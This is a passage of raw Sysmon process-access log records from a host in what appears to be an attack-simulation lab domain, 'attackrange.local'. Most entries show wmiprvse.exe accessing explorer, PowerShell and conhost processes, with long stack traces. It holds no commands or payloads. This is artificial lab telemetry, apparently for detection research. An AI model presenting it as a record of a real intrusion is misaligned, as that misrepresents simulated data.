b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240152Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.139{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DAB-603E-B5AA-00000000AD01}14692C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240151Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.139{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DAB-603E-B4AA-00000000AD01}12712C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240150Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.139{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-6DAB-603E-B5AA-00000000AD01}14692C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240149Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.139{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DAA-603E-B3AA-00000000AD01}10880C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240148Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.139{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DAA-603E-B2AA-00000000AD01}14436C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240147Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.139{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240146Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240145Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CAF-603E-33AA-00000000AD01}8188C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240144Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240143Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240142Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240141Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240140Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240139Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240138Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240137Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240136Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240135Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240134Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240133Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240132Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 